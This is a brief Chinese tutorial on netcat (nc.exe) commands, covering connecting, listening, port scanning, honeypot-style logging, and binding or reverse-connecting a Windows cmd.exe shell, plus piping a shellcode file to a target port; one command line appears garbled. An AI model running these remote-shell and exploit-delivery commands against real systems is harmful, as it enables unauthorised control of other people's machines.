nc.exe據(jù)網(wǎng)絡(luò)上介紹又叫腦殘.exe,就是我們常聽說的瑞士軍,在命令行下使用的網(wǎng)絡(luò)監(jiān)聽工具。
主要用法如下
1)連接到REMOTE主機(jī),例子: 格式:nc -nvv 192.168.x.x 80 講解:連到192.168.x.x的TCP80端口
2)監(jiān)聽LOCAL主機(jī),例子: 格式:nc -l -p 80 講解:監(jiān)聽本機(jī)的TCP80端口
3)掃描遠(yuǎn)程主機(jī),例子: 格式:nc -nvv -w2 -z 192.168.x.x 80-445 講解:掃描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主機(jī)綁定SHELL,例子: 格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 講解:綁定REMOTE主機(jī)的CMDSHELL在REMOTE主機(jī)的TCP5354端口
5)REMOTE主機(jī)綁定SHELL并反向連接,例子: 格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 講解:綁定REMOTE主機(jī)的CMDSHELL并反向連接到192.168.x.x的TCP5354端口 以上為最基本的幾種用法(其實(shí)NC的用法還有很多, 當(dāng)配合管道命令"|"與重定向命令"<"、">"等等命令功能更強(qiáng)大......)。
高級用法:
6)作攻擊程序用,例子:
格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc-nvv192.168.x.x80
講解:連接到192.168.x.x的80端口,并在其管道中發(fā)送'c:\ex ploit.txt'的內(nèi)容(兩種格式確有相同的效果, 真是有異曲同工之妙:P)
附:'c:\exploit.txt'為shellcode等 7)作蜜罐用[1],例子: 格式:nc -L -p 80 講解:使用'-L'(注意L是大寫)可以不停地監(jiān)聽某一個端口,直到ctrl+c為止
8)作蜜罐用[2],
例子: 格式:nc -L -p 80>c:\log.txt
講解:使用'-L'可以不停地監(jiān)聽某一個端口,直到ctrl+c為止,同時把結(jié)果輸出到'c:\log.txt'中,如果把'& gt;' 改為'>>'即可以追加日志 附:'c:\log.txt'為日志等
9)作蜜罐用[3],
例子: 格式1:nc -L -p 80 格式2:type.exe c:\honeypot.txt|nc -L -p 80
講解:使用'-L'可以不停地監(jiān)聽某一個端口,直到ctrl+c為止,并把'c:\honeypot.txt'的內(nèi)容'送'入其 管道中
- PC官方版
- 安卓官方手機(jī)版
- IOS官方手機(jī)版